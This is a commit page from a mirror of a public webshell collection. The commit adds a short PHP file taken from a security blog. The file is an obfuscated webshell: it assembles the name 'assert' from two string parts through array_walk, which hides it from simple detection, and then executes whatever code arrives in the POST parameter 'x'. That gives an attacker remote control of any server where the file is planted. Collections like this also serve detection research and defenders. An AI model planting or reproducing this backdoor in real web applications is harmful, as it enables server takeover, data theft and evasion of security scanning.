mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 21:01:29 +00:00
Create 2020.08.20.12.php
from : https://www.sqlsec.com/2020/07/shell.html
This commit is contained in:
9
php/2020.08.20.12.php
Normal file
9
php/2020.08.20.12.php
Normal file
@@ -0,0 +1,9 @@
|
|||||||
|
<?php
|
||||||
|
function sqlsec($value,$key)
|
||||||
|
{
|
||||||
|
$x = $key.$value;
|
||||||
|
$x($_POST['x']);
|
||||||
|
}
|
||||||
|
$a=array("ass"=>"ert");
|
||||||
|
array_walk($a,"sqlsec");
|
||||||
|
?>
|
||||||
Reference in New Issue
Block a user